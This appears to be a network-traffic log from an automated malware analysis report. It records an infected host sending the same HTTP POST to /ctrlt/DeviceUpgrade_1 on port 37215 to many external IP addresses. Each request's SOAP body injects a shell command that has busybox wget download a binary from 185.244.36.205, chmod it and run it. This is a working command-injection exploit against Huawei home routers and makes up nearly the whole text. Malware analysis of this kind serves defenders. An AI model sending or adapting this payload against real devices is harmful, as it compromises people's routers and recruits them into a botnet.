                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              303192.168.2.155718894.20.92.25237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206794024 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              304192.168.2.1546606102.213.139.937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206799030 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              305192.168.2.1540990157.180.172.2037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206804991 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              306192.168.2.1553752122.84.215.9537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206824064 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              307192.168.2.155839831.64.20.17137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206855059 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              308192.168.2.155882231.209.58.4937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206856966 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              309192.168.2.153865245.208.188.5537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206887960 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              310192.168.2.1542494181.131.121.12437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206891060 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              311192.168.2.1550572156.213.29.5637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206909895 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              312192.168.2.154409231.79.111.1137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206911087 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
